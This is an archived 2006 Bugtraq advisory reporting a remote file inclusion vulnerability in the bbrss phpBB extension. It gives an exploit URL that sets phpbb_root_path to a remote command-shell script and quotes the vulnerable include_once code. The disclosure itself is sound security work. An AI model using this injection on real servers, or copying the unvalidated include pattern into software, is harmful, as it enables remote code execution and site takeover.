| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060614045646.780.qmail@securityfocus.com>
Date: 14 Jun 2006 04:56:46 -0000
From: SpC-x@...mail.Org
To: bugtraq@...urityfocus.com
Subject: bbrss PhpBB (phpbb_root_path) Remote File Inclusion
######################################################
# bbrss PhpBB (phpbb_root_path) Remote File Inclusion
######################################################
# Credit : SpC-x | The_BeKiR
# Site : http://wWw.SaVSaK.CoM
######################################################
# Greetz :
# | The_BeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x |
######################################################
Remote File Inclusion :
http://www.target.com/path/bbrss.php?phpbb_root_path=Command*Shell
Bbrss.PHP :
define('IN_PHPBB', true); // to ensure your script works ! //
$phpbb_root_path = './';
include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.php');
/SpC-x